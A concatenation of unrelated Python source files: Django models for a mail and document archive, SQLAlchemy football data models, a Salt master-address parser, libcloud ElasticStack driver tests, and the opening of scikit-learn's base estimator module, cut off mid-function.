related_name = 'received_messages')
cc_addresses = models.ManyToManyField(Address,
blank = True,
null = True,
related_name = 'copied_messages')
__str__ = lambda self : '%s (%s) on %s' % (self.message_id, self.subject, self.date)
__unicode__ = __str__
def get_asset(self, asset_class, mime_type):
""" Get an asset associated with this message """
# E1101 = instance of 'Message' has no 'assets' member
# pylint: disable-msg=E1101
logging.info('getting %s %s for Message %s (%s)' %(asset_class, mime_type, self, self.pk))
if isinstance(asset_class, AssetClass):
return self.assets.get(asset_class__pk = asset_class.pk,
mime_type__name = mime_type)
else:
all = self.assets.filter(asset_class__name = asset_class,
mime_type__name = mime_type).all()
logging.info(all)
if len(all):
return all[0]
else:
logging.info('NO ASSET %s %s for Message %s (%s)' %(asset_class, mime_type, self, self.pk))
return None
###############################################################################
class MessageRule(models.Model):
"""
"""
CONVERSATION = 1
NEWSLETTER = 2
owner = models.ForeignKey(
User,
related_name = 'message_rules')
type = models.IntegerField(default = NEWSLETTER)
sender_address = models.ForeignKey(Address,
null = True,
related_name = 'message_rules')
__str__ = lambda self : str('%s %s' % (self.owner, (self.type ==
MessageRule.NEWSLETTER and 'N' or 'C')))
__unicode__ = __str__
# def save(self, *args, **kwargs):
# logging.info('Saving MessageRule %s', self)
# super(MessageRule, self).save(*args, **kwargs)
###############################################################################
class MessageAggregate(models.Model):
""" A Message aggregate is a ordered set of messages that match a
particular criteria"""
STATUS_READY = 1 # fully-formed aggregate
STATUS_DELETED = -1 # deleted aggregate
owner = models.ForeignKey(
User,
related_name = 'aggregates')
creator = models.ForeignKey(
MessageRule,
related_name = 'aggregates')
messages = models.ManyToManyField(
Message,
related_name = 'aggregates',
blank = True,
symmetrical = True )
tags = models.ManyToManyField(
Tag,
related_name = 'aggregates',
blank = True,
symmetrical = True )
modified_date = models.DateTimeField(null = True, auto_now = True)
created_date = models.DateTimeField(null = True, auto_now_add = True)
status = models.IntegerField(default = STATUS_READY)
def _get_latest_message(self):
messages = self.messages.all().order_by('-date')
if messages.count():
return messages[0]
else:
return None
latest_message = property(_get_latest_message)
def _get_latest_sender(self):
return self.latest_message and self.latest_message.sender_address or None
latest_sender = property(_get_latest_sender)
def _get_name_as_initial_subject(self):
messages = self.messages.all().order_by('date')
if messages.count():
return messages[0].subject
else:
return ''
name = property(_get_name_as_initial_subject)
def _get_summary_of_latest_message(self):
messages = self.messages.all().order_by('date')
if messages.count():
return messages[0].summary
else:
return ''
summary = property(_get_summary_of_latest_message)
__str__ = lambda self : str('%s: %s' % (self.creator__type ==
MessageRule.NEWSLETTER and 'N' or 'C',
self.name))
__unicode__ = __str__
###############################################################################
class AssetClass(models.Model):
"""
A semantic tag on an document asset.
"""
UPLOAD = 'upload'
DOCUMENT = 'document'
PAGE_ORIGINAL = 'original'
PAGE_IMAGE = 'image'
PAGE_THUMBNAIL = 'thumbnail'
PAGE_BANNER = 'banner'
PAGE_TEXT = 'text'
MESSAGE_PART = 'message.part'
name = models.CharField(
max_length = 64,
unique = True,
db_index = True,
help_text = 'Unique label for this asset class' )
producers = models.ManyToManyField(
Process,
related_name = 'outputs',
help_text = 'The processes that create this asset class' )
consumers = models.ManyToManyField(
Process,
related_name = 'inputs',
help_text = 'The processes that act on this asset class' )
__str__ = lambda self : str(self.name)
__unicode__ = __str__
def has_consumers(self, mime_type):
""" True if there is a consumer for assets of the given mime type """
suffix = isinstance(mime_type, MimeType) and '' or '__name'
return 0 != self.consumers.filter(
** { 'mime_types%s' % suffix : mime_type } ).count()
###############################################################################
class AssetManager(models.Manager):
def create(self, **kwargs):
kwargs = kwargs.copy()
asset_class = kwargs.get('asset_class')
if isinstance( asset_class, str):
kwargs['asset_class'] = manager(AssetClass).get(name = asset_class)
mime_type = kwargs.get('mime_type')
if isinstance( mime_type, str):
kwargs['mime_type'] = manager(MimeType).get_or_create(
name = mime_type) [ 0 ]
if 'file_name' in kwargs:
kwargs.setdefault('orig_file_name', kwargs.pop('file_name'))
return models.Manager.create(self, **kwargs)
###############################################################################
class Asset(models.Model):
"""
A file object stored in the archive. Assets are tagged with one
or more asset classes. Example assets include: uploads,
thumbnails, ocr text, etc.
"""
objects = AssetManager()
owner = models.ForeignKey(
User,
related_name = 'assets' )
producer = models.ForeignKey(
Processor,
null = True,
default = None,
related_name = 'created_assets')
asset_class = models.ForeignKey(
AssetClass,
related_name = 'assets' )
parent = models.ForeignKey(
'Asset',
null = True,
default = None,
related_name = 'children')
child_number = models.IntegerField()
orig_file_name = models.CharField(
max_length = 255,
blank = True )
mime_type = models.ForeignKey(
MimeType,
related_name = 'assets' )
related_page = models.ForeignKey(
Page,
null = True,
default = None,
related_name = 'assets' )
related_document = models.ForeignKey(
Document,
null = True,
default = None,
related_name = 'assets' )
related_message = models.ForeignKey(
Message,
null = True,
default = None,
related_name = 'assets' )
date_created = models.DateTimeField(
auto_now_add = True )
date_last_modified = models.DateTimeField(
auto_now = True )
file_name = property(
lambda self: 'asset-%d-%s.%s' % (
self.pk,
self.asset_class,
self.mime_type.extension ))
s3_key = property(
lambda self: 'user_data/%d/assets/%s' % (
self.owner.pk,
self.pk ) )
description = property(repr)
consumers = property(
lambda self: self.asset_class.consumers.filter(
mime_types = self.mime_type ))
__str__ = lambda self : self.file_name
__unicode__ = __str__
__repr__ = lambda self : \
'Asset<' \
'asset-id=%s, ' \
'owner-id=%s, ' \
'producer=%s, ' \
'asset_class=%s, ' \
'content_type=%s>' % (
self.pk,
self.owner.pk,
self.producer,
self.asset_class,
self.mime_type )
def get_children(self, asset_class):
return self.children.filter( asset_class__name = asset_class )
class Meta:
unique_together = [
( 'parent', 'asset_class', 'child_number'),
]
###############################################################################
class Query(models.Model):
"""
A query that the user has previously run
"""
owner = models.ForeignKey(
User,
related_name = 'queries')
last_run = models.DateTimeField(
db_index = True,
auto_now = True)
since_last_run = property(lambda self : timesince(self.last_run))
name = models.CharField(
max_length = 64,
blank = True,
db_index = True)
value = models.CharField(
max_length = 255,
db_index = True)
__str__ = lambda self : self.name
__unicode__ = __str__
###############################################################################
class EncryptionKey(models.Model):
owner = models.ForeignKey(
User,
unique = True,
null = False,
related_name = 'encryption_keys' )
value = models.CharField(
max_length = 64,
blank = False,
null = False )
__str__ = lambda self : self.value
__unicode__ = __str__
###############################################################################
class AccountClass(models.Model):
EMAIL_GMAIL = 'email/gmail'
EMAIL_IMAP = 'email/imap'
name = models.CharField(
max_length = 64,
blank = False,
null = False )
__str__ = lambda self : self.name
__unicode__ = __str__
###############################################################################
class Account(models.Model):
owner = models.ForeignKey(
User,
null = False,
related_name = 'accounts' )
id = models.CharField(
max_length = 64,
primary_key = True)
account_class = models.ForeignKey(
'AccountClass',
null = True,
default = None)
name = models.CharField(
max_length = 64,
blank = False,
null = False )
password = models.CharField(
max_length = 64,
blank = True,
null = False )
server = models.CharField(
max_length = 64,
blank = True,
null = False )
ssl = models.BooleanField(
blank = True,
null = False )
__str__ = lambda self : '%s of %s' % (self.name, self.owner.username)
__unicode__ = __str__
| |
from datetime import date
from sqlalchemy import (case, select, cast, Column, Integer, Numeric, Date,
String, Sequence, ForeignKey, Unicode)
from sqlalchemy.orm import relationship, backref
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy.schema import CheckConstraint
from models.common import BaseSchema
import models.common.enums as enums
class Countries(BaseSchema):
"""
Countries data model.
Countries are defined as FIFA-affiliated national associations.
"""
__tablename__ = "countries"
id = Column(Integer, Sequence('country_id_seq', start=100), primary_key=True)
name = Column(Unicode(60))
code = Column(String(3))
confederation = Column(enums.ConfederationType.db_type())
def __repr__(self):
return u"<Country(id={0}, name={1}, trigram={2}, confed={3})>".format(
self.id, self.name, self.code, self.confederation.value).encode('utf-8')
class Years(BaseSchema):
"""
Years data model.
"""
__tablename__ = "years"
id = Column(Integer, Sequence('year_id_seq', start=100), primary_key=True)
yr = Column(Integer, unique=True)
def __repr__(self):
return "<Year(yr={0})>".format(self.yr)
class Seasons(BaseSchema):
"""
Seasons data model.
"""
__tablename__ = "seasons"
id = Column(Integer, Sequence('season_id_seq', start=100), primary_key=True)
start_year_id = Column(Integer, ForeignKey('years.id'))
end_year_id = Column(Integer, ForeignKey('years.id'))
start_year = relationship('Years', foreign_keys=[start_year_id])
end_year = relationship('Years', foreign_keys=[end_year_id])
@hybrid_property
def name(self):
"""
List year(s) that make up season. Seasons over calendar year will be of form YYYY;
seasons over two years will be of form YYYY-YYYY.
"""
if self.start_year.yr == self.end_year.yr:
return self.start_year.yr
else:
return "{0}-{1}".format(self.start_year.yr, self.end_year.yr)
@name.expression
def name(cls):
"""
List year(s) that make up season. Seasons over calendar year will be of form YYYY;
seasons over two years will be of form YYYY-YYYY.
This expression allows `name` to be used as a query parameter.
"""
yr1 = select([Years.yr]).where(cls.start_year_id == Years.id).as_scalar()
yr2 = select([Years.yr]).where(cls.end_year_id == Years.id).as_scalar()
return cast(yr1, String) + case([(yr1 == yr2, '')], else_='-'+cast(yr2, String))
@hybrid_property
def reference_date(self):
"""
Define the reference date that is used to calculate player ages.
+------------------------+---------------------+
| Season type | Reference date |
+========================+=====================+
| European (Split years) | 30 June |
+------------------------+---------------------+
| Calendar-year | 31 December |
+------------------------+---------------------+
:return: Date object that expresses reference date.
"""
if self.start_year.yr == self.end_year.yr:
return date(self.end_year.yr, 12, 31)
else:
return date(self.end_year.yr, 6, 30)
def __repr__(self):
return "<Season({0})>".format(self.name)
class Competitions(BaseSchema):
"""
Competitions common data model.
"""
__tablename__ = 'competitions'
id = Column(Integer, Sequence('competition_id_seq', start=1000), primary_key=True)
name = Column(Unicode(80))
level = Column(Integer)
discriminator = Column('type', String(20))
__mapper_args__ = {
'polymorphic_identity': 'competitions',
'polymorphic_on': discriminator
}
class DomesticCompetitions(Competitions):
"""
Domestic Competitions data model, inherited from Competitions model.
"""
__mapper_args__ = {'polymorphic_identity': 'domestic'}
country_id = Column(Integer, ForeignKey('countries.id'))
country = relationship('Countries', backref=backref('competitions'))
def __repr__(self):
return u"<DomesticCompetition(name={0}, country={1}, level={2})>".format(
self.name, self.country.name, self.level).encode('utf-8')
class InternationalCompetitions(Competitions):
"""
International Competitions data model, inherited from Competitions model.
"""
__mapper_args__ = {'polymorphic_identity': 'international'}
confederation = Column(enums.ConfederationType.db_type())
def __repr__(self):
return u"<InternationalCompetition(name={0}, confederation={1})>".format(
self.name, self.confederation.value).encode('utf-8')
class Venues(BaseSchema):
__tablename__ = 'venues'
id = Column(Integer, Sequence('venue_id_seq', start=1000), primary_key=True)
name = Column(Unicode(60), doc="The name of the match venue")
city = Column(Unicode(60), doc="Name of city/locality where venue resides")
region = Column(Unicode(60), doc="Name of administrative region (state, province, etc) where venue resides")
latitude = Column(Numeric(9, 6), CheckConstraint("latitude >= -90.000000 AND latitude <= 90.000000"),
default=0.000000, doc="Venue latitude in decimal degrees")
longitude = Column(Numeric(9, 6), CheckConstraint("longitude >= -180.000000 AND longitude <= 180.000000"),
default=0.000000, doc="Venue longitude in decimal degrees")
altitude = Column(Integer, CheckConstraint("altitude >= -200 AND altitude <= 4500"),
default=0, doc="Venue altitude in meters")
country_id = Column(Integer, ForeignKey('countries.id'))
country = relationship('Countries', backref=backref('venues'))
timezone_id = Column(Integer, ForeignKey('timezones.id'))
timezone = relationship('Timezones', backref=backref('venues'))
def __repr__(self):
return u"<Venue(name={0}, city={1}, country={2})>".format(
self.name, self.city, self.country.name).encode('utf-8')
class VenueHistory(BaseSchema):
__tablename__ = 'venue_histories'
id = Column(Integer, Sequence('venuehist_id_seq', start=10000), primary_key=True)
date = Column(Date, doc="Effective date of venue configuration")
length = Column(Integer, CheckConstraint("length >= 90 AND length <= 120"),
default=105, doc="Length of venue playing surface in meters")
width = Column(Integer, CheckConstraint("width >= 45 AND width <= 90"),
default=68, doc="Width of venue playing surface in meters")
capacity = Column(Integer, CheckConstraint("capacity >= 0"),
default=0, doc="Total venue capacity (seated and unseated)")
seats = Column(Integer, CheckConstraint("seats >= 0"),
default=0, doc="Total seats at venue")
venue_id = Column(Integer, ForeignKey('venues.id'))
venue = relationship('Venues', backref=backref('histories'))
surface_id = Column(Integer, ForeignKey('surfaces.id'))
surface = relationship('Surfaces', backref=backref('venues'))
def __repr__(self):
return u"<VenueHistory(name={0}, date={1}, length={2}, width={3}, capacity={4})>".format(
self.venue.name, self.date.isoformat(), self.length, self.width, self.capacity).encode('utf-8')
class Timezones(BaseSchema):
__tablename__ = 'timezones'
id = Column(Integer, Sequence('timezone_id_seq', start=1000), primary_key=True)
name = Column(Unicode(80), doc="Name of the time zone geographic region", nullable=False)
offset = Column(Numeric(4, 2), doc="Offset of the time zone region from UTC, in decimal hours", nullable=False)
confederation = Column(enums.ConfederationType.db_type())
def __repr__(self):
return u"<Timezone(name={0}, offset={1:+1.2f}, confederation={2})>".format(
self.name, self.offset, self.confederation.value).encode('utf-8')
class Surfaces(BaseSchema):
__tablename__ = 'surfaces'
id = Column(Integer, Sequence('surface_id_seq', start=10), primary_key=True)
description = Column(Unicode(60), nullable=False)
type = Column(enums.SurfaceType.db_type())
def __repr__(self):
return u"<Surface(description={0}, type={1})>".format(
self.description, self.type.description).encode('utf-8')
| |
"""
The daemons package is used to store implementations of the Salt Master and
Minion enabling different transports.
"""
import logging
import sys
from collections.abc import Iterable, Mapping, Sequence
log = logging.getLogger(__name__)
def is_non_string_iterable(obj):
"""
Returns True if obj is non-string iterable, False otherwise
Future proof way that is compatible with both Python3 and Python2 to check
for non string iterables.
Assumes in Python3 that, basestring = (str, bytes)
"""
return not isinstance(obj, str) and isinstance(obj, Iterable)
def is_non_string_sequence(obj):
"""
Returns True if obj is non-string sequence, False otherwise
Future proof way that is compatible with both Python3 and Python2 to check
for non string sequences.
Assumes in Python3 that, basestring = (str, bytes)
"""
return not isinstance(obj, str) and isinstance(obj, Sequence)
def extract_masters(opts, masters="master", port=None, raise_if_empty=True):
"""
Parses opts and generates a list of master (host,port) addresses.
By default looks for list of masters in opts['master'] and uses
opts['master_port'] as the default port when otherwise not provided.
Use the opts key given by masters for the masters list, default is 'master'
If parameter port is not None then uses the default port given by port
Returns a list of host address dicts of the form
[
{
'external': (host,port),
'internal': (host, port)
},
...
]
When only one address is provided it is assigned to the external address field
When not provided the internal address field is set to None.
For a given master the syntax options are as follows:
hostname [port]
external: hostname [port]
[internal: hostaddress [port]]
Where the hostname string could be either an FQDN or host address
in dotted number notation.
master.example.com
10.0.2.110
And the hostadress is in dotted number notation
The space delimited port is optional and if not provided a default is used.
The internal address is optional and if not provided is set to None
Examples showing the YAML in /etc/salt/master conf file:
1) Single host name string (fqdn or dotted address)
a)
master: me.example.com
b)
master: localhost
c)
master: 10.0.2.205
2) Single host name string with port
a)
master: me.example.com 4506
b)
master: 10.0.2.205 4510
3) Single master with external and optional internal host addresses for nat
in a dict
master:
external: me.example.com 4506
internal: 10.0.2.100 4506
3) One or host host names with optional ports in a list
master:
- me.example.com 4506
- you.example.com 4510
- 8.8.8.8
- they.example.com 4506
- 8.8.4.4 4506
4) One or more host name with external and optional internal host addresses
for Nat in a list of dicts
master:
-
external: me.example.com 4506
internal: 10.0.2.100 4506
-
external: you.example.com 4506
internal: 10.0.2.101 4506
-
external: we.example.com
- they.example.com
"""
if port is not None:
master_port = opts.get(port)
else:
master_port = opts.get("master_port")
try:
master_port = int(master_port)
except ValueError:
master_port = None
if not master_port:
emsg = "Invalid or missing opts['master_port']."
log.error(emsg)
raise ValueError(emsg)
entries = opts.get(masters, [])
if not entries:
emsg = "Invalid or missing opts['{}'].".format(masters)
log.error(emsg)
if raise_if_empty:
raise ValueError(emsg)
hostages = []
# extract candidate hostage (hostname dict) from entries
if is_non_string_sequence(entries): # multiple master addresses provided
for entry in entries:
if isinstance(entry, Mapping): # mapping
external = entry.get("external", "")
internal = entry.get("internal", "")
hostages.append(dict(external=external, internal=internal))
elif isinstance(entry, str): # string
external = entry
internal = ""
hostages.append(dict(external=external, internal=internal))
elif isinstance(entries, Mapping): # mapping
external = entries.get("external", "")
internal = entries.get("internal", "")
hostages.append(dict(external=external, internal=internal))
elif isinstance(entries, str): # string
external = entries
internal = ""
hostages.append(dict(external=external, internal=internal))
# now parse each hostname string for host and optional port
masters = []
for hostage in hostages:
external = hostage["external"]
internal = hostage["internal"]
if external:
external = parse_hostname(external, master_port)
if not external:
continue # must have a valid external host address
internal = parse_hostname(internal, master_port)
masters.append(dict(external=external, internal=internal))
return masters
def parse_hostname(hostname, default_port):
"""
Parse hostname string and return a tuple of (host, port)
If port missing in hostname string then use default_port
If anything is not a valid then return None
hostname should contain a host and an option space delimited port
host port
As an attempt to prevent foolish mistakes the parser also tries to identify
the port when it is colon delimited not space delimited. As in host:port.
This is problematic since IPV6 addresses may have colons in them.
Consequently the use of colon delimited ports is strongly discouraged.
An ipv6 address must have at least 2 colons.
"""
try:
host, sep, port = hostname.strip().rpartition(" ")
if not port: # invalid nothing there
return None
if not host: # no space separated port, only host as port use default port
host = port
port = default_port
# ipv6 must have two or more colons
if host.count(":") == 1: # only one so may be using colon delimited port
host, sep, port = host.rpartition(":")
if not host: # colon but not host so invalid
return None
if not port: # colon but no port so use default
port = default_port
host = host.strip()
try:
port = int(port)
except ValueError:
return None
except AttributeError:
return None
return (host, port)
| |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from libcloud.utils.py3 import httplib
from libcloud.compute.base import Node
from libcloud.compute.drivers.elasticstack import ElasticStackException
from libcloud.compute.drivers.elastichosts import \
ElasticHostsNodeDriver as ElasticHosts
from libcloud.compute.drivers.skalicloud import \
SkaliCloudNodeDriver as SkaliCloud
from libcloud.compute.drivers.serverlove import \
ServerLoveNodeDriver as ServerLove
from libcloud.common.types import InvalidCredsError, MalformedResponseError
from libcloud.test import MockHttp, unittest
from libcloud.test.file_fixtures import ComputeFileFixtures
class ElasticStackTestCase(object):
def setUp(self):
# Re-use ElasticHosts fixtures for the base ElasticStack platform tests
self.mockHttp = ElasticStackMockHttp
self.mockHttp.type = None
self.node = Node(id=72258, name=None, state=None, public_ips=None,
private_ips=None, driver=self.driver)
def test_invalid_creds(self):
self.mockHttp.type = 'UNAUTHORIZED'
try:
self.driver.list_nodes()
except InvalidCredsError:
e = sys.exc_info()[1]
self.assertEqual(True, isinstance(e, InvalidCredsError))
else:
self.fail('test should have thrown')
def test_malformed_response(self):
self.mockHttp.type = 'MALFORMED'
try:
self.driver.list_nodes()
except MalformedResponseError:
pass
else:
self.fail('test should have thrown')
def test_parse_error(self):
self.mockHttp.type = 'PARSE_ERROR'
try:
self.driver.list_nodes()
except Exception:
e = sys.exc_info()[1]
self.assertTrue(str(e).find('X-Elastic-Error') != -1)
else:
self.fail('test should have thrown')
def test_ex_set_node_configuration(self):
success = self.driver.ex_set_node_configuration(node=self.node,
name='name',
cpu='2')
self.assertTrue(success)
def test_ex_set_node_configuration_invalid_keys(self):
try:
self.driver.ex_set_node_configuration(node=self.node, foo='bar')
except ElasticStackException:
pass
else:
self.fail(
'Invalid option specified, but an exception was not thrown')
def test_list_nodes(self):
nodes = self.driver.list_nodes()
self.assertTrue(isinstance(nodes, list))
self.assertEqual(len(nodes), 1)
node = nodes[0]
self.assertEqual(node.public_ips[0], "1.2.3.4")
self.assertEqual(node.public_ips[1], "1.2.3.5")
self.assertEqual(node.extra['smp'], 1)
self.assertEqual(
node.extra['ide:0:0'], "b6049e7a-aa1b-47f9-b21d-cdf2354e28d3")
def test_list_offline_node(self):
self.mockHttp.type = 'OFFLINE'
nodes = self.driver.list_nodes()
self.assertTrue(isinstance(nodes, list))
self.assertEqual(len(nodes), 1)
node = nodes[0]
self.assertEqual(len(node.public_ips), 0, "Public IPs was not empty")
self.assertNotIn('smp', node.extra)
self.assertNotIn('started', node.extra)
self.assertEqual(
node.extra['ide:0:0'], "b6049e7a-aa1b-47f9-b21d-cdf2354e28d3")
def test_list_sizes(self):
images = self.driver.list_sizes()
self.assertEqual(len(images), 6)
image = [i for i in images if i.id == 'small'][0]
self.assertEqual(image.id, 'small')
self.assertEqual(image.name, 'Small instance')
self.assertEqual(image.cpu, 2000)
self.assertEqual(image.ram, 1700)
self.assertEqual(image.disk, 160)
self.assertTrue(isinstance(image.price, float))
def test_list_images(self):
images = self.driver.list_images()
self.assertEqual(len(images), len(self.driver._standard_drives))
for uuid, values in list(self.driver._standard_drives.items()):
self.assertEqual(
len([image for image in images if image.id == uuid]), 1)
def test_reboot_node(self):
node = self.driver.list_nodes()[0]
self.assertTrue(self.driver.reboot_node(node))
def test_destroy_node(self):
node = self.driver.list_nodes()[0]
self.assertTrue(self.driver.destroy_node(node))
def test_create_node(self):
sizes = self.driver.list_sizes()
size = [s for s in sizes if s.id == 'large'][0]
image = self.image
self.assertTrue(self.driver.create_node(name="api.ivan.net.nz",
image=image, size=size))
class ElasticHostsTestCase(ElasticStackTestCase, unittest.TestCase):
def setUp(self):
ElasticHosts.connectionCls.conn_class = ElasticStackMockHttp
self.driver = ElasticHosts('foo', 'bar')
images = self.driver.list_images()
self.image = [i for i in images if
i.id == '38df0986-4d85-4b76-b502-3878ffc80161'][0]
super(ElasticHostsTestCase, self).setUp()
def test_multiple_drivers_with_different_regions(self):
driver1 = ElasticHosts('foo', 'bar', region='lon-p')
driver2 = ElasticHosts('foo', 'bar', region='sat-p')
self.assertTrue(driver1.connection.host.startswith('api-lon-p'))
self.assertTrue(driver2.connection.host.startswith('api-sat-p'))
driver1.list_nodes()
driver2.list_nodes()
driver1.list_nodes()
self.assertTrue(driver1.connection.host.startswith('api-lon-p'))
self.assertTrue(driver2.connection.host.startswith('api-sat-p'))
def test_invalid_region(self):
expected_msg = r'Invalid region.+'
self.assertRaisesRegexp(ValueError, expected_msg, ElasticHosts,
'foo', 'bar', region='invalid')
class SkaliCloudTestCase(ElasticStackTestCase, unittest.TestCase):
def setUp(self):
SkaliCloud.connectionCls.conn_class = ElasticStackMockHttp
self.driver = SkaliCloud('foo', 'bar')
images = self.driver.list_images()
self.image = [i for i in images if
i.id == '90aa51f2-15c0-4cff-81ee-e93aa20b9468'][0]
super(SkaliCloudTestCase, self).setUp()
class ServerLoveTestCase(ElasticStackTestCase, unittest.TestCase):
def setUp(self):
ServerLove.connectionCls.conn_class = ElasticStackMockHttp
self.driver = ServerLove('foo', 'bar')
images = self.driver.list_images()
self.image = [i for i in images if
i.id == '679f5f44-0be7-4745-a658-cccd4334c1aa'][0]
super(ServerLoveTestCase, self).setUp()
class ElasticStackMockHttp(MockHttp):
fixtures = ComputeFileFixtures('elastichosts')
def _servers_info_UNAUTHORIZED(self, method, url, body, headers):
return (httplib.UNAUTHORIZED, body, {}, httplib.responses[httplib.NO_CONTENT])
def _servers_info_MALFORMED(self, method, url, body, headers):
body = "{malformed: '"
return (httplib.OK, body, {}, httplib.responses[httplib.NO_CONTENT])
def _servers_info_PARSE_ERROR(self, method, url, body, headers):
return (505, body, {}, httplib.responses[httplib.NO_CONTENT])
def _servers_b605ca90_c3e6_4cee_85f8_a8ebdf8f9903_reset(self, method, url, body, headers):
return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT])
def _servers_b605ca90_c3e6_4cee_85f8_a8ebdf8f9903_destroy(self, method, url, body, headers):
return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT])
def _drives_create(self, method, url, body, headers):
body = self.fixtures.load('drives_create.json')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _drives_0012e24a_6eae_4279_9912_3432f698cec8_image_38df0986_4d85_4b76_b502_3878ffc80161_gunzip(self, method,
url, body,
headers):
# ElasticHosts image
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _drives_0012e24a_6eae_4279_9912_3432f698cec8_image_90aa51f2_15c0_4cff_81ee_e93aa20b9468_gunzip(self, method,
url, body,
headers):
# Skalikloud image
return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT])
def _drives_0012e24a_6eae_4279_9912_3432f698cec8_image_679f5f44_0be7_4745_a658_cccd4334c1aa_gunzip(self, method,
url, body,
headers):
# ServerLove image
return (httplib.NO_CONTENT, body, {}, httplib.responses[httplib.NO_CONTENT])
def _drives_0012e24a_6eae_4279_9912_3432f698cec8_info(self, method, url, body, headers):
body = self.fixtures.load('drives_info.json')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _servers_create(self, method, url, body, headers):
body = self.fixtures.load('servers_create.json')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _servers_info(self, method, url, body, headers):
body = self.fixtures.load('servers_info.json')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _servers_info_OFFLINE(self, method, url, body, headers):
body = self.fixtures.load('offline_servers_info.json')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _servers_72258_set(self, method, url, body, headers):
body = '{}'
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if __name__ == '__main__':
sys.exit(unittest.main())
| |
"""Base class for all estimators."""
# Author: Gael Varoquaux <gael.varoquaux@normalesup.org>
# License: BSD Style
import copy
import inspect
import numpy as np
from scipy import sparse
import warnings
from .metrics import r2_score
###############################################################################
def clone(estimator, safe=True):
"""Constructs a new estimator with the same parameters.
Clone does a deep copy of the model in an estimator
without actually copying attached data. It yields a new estimator
with the same parameters that has not been fit on any data.
Parameters
----------
estimator: estimator object, or list, tuple or set of objects
The estimator or group of estimators to be cloned
safe: boolean, optional
If safe is false, clone will fall back to a deepcopy on objects
that are not estimators.
"""
estimator_type = type(estimator)
# XXX: not handling dictionnaries
if estimator_type in (list, tuple, set, frozenset):
return estimator_type([clone(e, safe=safe) for e in estimator])
elif not hasattr(estimator, '_get_params'):
if not safe:
return copy.deepcopy(estimator)
else:
raise ValueError("Cannot clone object '%s' (type %s): "
"it does not seem to be a scikit-learn estimator as "
"it does not implement a '_get_params' methods."
% (repr(estimator), type(estimator)))
klass = estimator.__class__
new_object_params = estimator._get_params(deep=False)
for name, param in new_object_params.iteritems():
new_object_params[name] = clone(param, safe=False)
new_object = klass(**new_object_params)
params_set = new_object._get_params(deep=False)
for name in new_object_params:
param1 = new_object_params[name]
param2 = params_set[name]
if isinstance(param1, np.ndarray):
# For ndarrays, we do not test for complete equality
equality_test = (param1.shape == param2.shape
and param1.dtype == param2.dtype
and param1[0] == param2[0]
and param1[-1] == param2[-1])
elif sparse.issparse(param1):
# For sparse matrices equality doesn't work
equality_test = (param1.__class__ == param2.__class__
and param1.data[0] == param2.data[0]
and param1.data[-1] == param2.data[-1]
and param1.nnz == param2.nnz
and param1.shape == param2.shape)
else:
equality_test = new_object_params[name] == params_set[name]
assert equality_test, (
'Cannot clone object %s, as the constructor does not '
'seem to set parameter %s' % (estimator, name)
)
return new_object
###############################################################################
def _pprint(params, offset=0, printer=repr):
"""Pretty print the dictionnary 'params'
Parameters
----------
params: dict
The dictionnary to pretty print
offset: int
The offset in characters to add at the begin of each line.
printer:
The function to convert entries to strings, typically
the builtin str or repr
"""
# Do a multi-line justified repr:
options = np.get_printoptions()
np.set_printoptions(precision=5, threshold=64, edgeitems=2)
params_list = list()
this_line_length = offset
line_sep = ',\n' + (1 + offset // 2) * ' '
for i, (k, v) in enumerate(sorted(params.iteritems())):
if type(v) is float:
# use str for representing floating point numbers
# this way we get consistent representation across
# architectures and versions.
this_repr = '%s=%s' % (k, str(v))
else:
# use repr of the rest
this_repr = '%s=%s' % (k, printer(v))
if len(this_repr) > 500:
this_repr = this_repr[:300] + '...' + this_repr[-100:]
if i > 0:
if (this_line_length + len(this_repr) >= 75
or '\n' in this_repr):
params_list.append(line_sep)
this_line_length = len(line_sep)
else:
params_list.append(', ')
this_line_length += 2
params_list.append(this_repr)
this_line_length += len(this_repr)
np.set_printoptions(**options)
lines = ''.join(params_list)
# Strip trailing space to avoid nightmare in doctests
lines = '\n'.join(l.rstrip(' ') for l in lines.split('\n'))
return lines
###############################################################################
class BaseEstimator(object):
"""Base class for all estimators in the scikit learn
Notes
-----
All estimators should specify all the parameters that can be set
at the class level in their __init__ as explicit keyword
arguments (no *args, **kwargs).
"""
@classmethod
def _get_param_names(cls):
"""Get parameter names for the estimator"""
try:
# fetch the constructor or the original constructor before
# deprecation wrapping if any
init = getattr(cls.__init__, 'deprecated_original', cls.__init__)
# introspect the constructor arguments to find the model parameters
# to represent
args, varargs, kw, default = inspect.getargspec(init)
assert varargs is None, (
'scikit learn estimators should always specify their '
'parameters in the signature of their init (no varargs).'
)
# Remove 'self'
# XXX: This is going to fail if the init is a staticmethod, but
# who would do this?
args.pop(0)
except TypeError:
# No explicit __init__
args = []
args.sort()
return args
def _get_params(self, deep=True):
"""Get parameters for the estimator
Parameters
----------
deep: boolean, optional
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
"""
out = dict()
for key in self._get_param_names():
value = getattr(self, key)
if deep and hasattr(value, '_get_params'):
deep_items = value._get_params().items()
out.update((key + '__' + k, val) for k, val in deep_items)
out[key] = value
return out
def set_params(self, **params):
"""Set the parameters of the estimator.
The method works on simple estimators as well as on nested
objects (such as pipelines). The former have parameters of the
form <component>__<parameter> so that it's possible to update
each component of a nested object.
Returns
-------
self
"""
if not params:
# Simple optimisation to gain speed (inspect is slow)
return
valid_params = self._get_params(deep=True)
for key, value in params.iteritems():
split = key.split('__', 1)
if len(split) > 1:
# nested objects case
